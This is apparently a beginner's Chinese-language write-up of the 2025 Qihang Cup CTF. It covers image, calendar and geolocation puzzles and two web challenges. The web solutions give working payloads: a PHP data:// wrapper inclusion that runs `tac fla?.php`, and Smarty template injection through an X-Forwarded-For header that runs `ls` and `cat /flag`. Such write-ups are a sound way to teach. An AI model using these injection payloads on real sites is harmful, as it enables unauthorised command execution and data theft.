2025启航杯

PvzHE

flag就在文件中的图片里,游戏是植物大战僵尸,居然真的可以玩
输入图片说明

QHCTF For Year 2025

输入图片说明

第一个下载的文件是10串数字,以-分割,结合日历,每一行的两个数字为一组,在日历上画出来,就是flag
QH{FUN}
输入图片说明

请找出拍摄地在哪里

根据图片中的洋丰复合肥,柳化复合肥和它上面的4S店广告,可以确定地点是柳城县,再根据高德地图雅迪电动车的位置可以找到图片中的位置,G323国道那个

Easy_include

是一个简单的文件包含,只需要不出现flag.php就可以了,我们考虑使用data伪协议进行绕过,
?file=data://text/plain,<?php system(“tac fla?.php”);
再访问网页源代码就可以拿到flag

1
2
3
4
5
6
7
8
9
10
11
12
<?php   
error_reporting(0);   //flag in flag.php   
$file=$_GET['file'];   
if(isset($file))   {   
if(!preg_match("/flag/i",$file))   
{   include($file);   
}else{   
echo("no no no ~ ");   
}   
}else   {   highlight_file(__FILE__);   
}      
?>

输入图片说明

输入图片说明

Web_IP

这道题和buuctf上的the mystery of ip做法和思路完全一样,这两道题几乎是只改了名称,感兴趣的可以去做做

这道题考察的是smart注入,使用BP添加
X-Forwarded-For:127.0.0.1{{system('ls')}}找到flag.php
X-Forwarded-For:127.0.0.1{{system('cat /flag')}}打开flag.php文件,得到flag

输入图片说明

首次参加ctf比赛–2025.1.16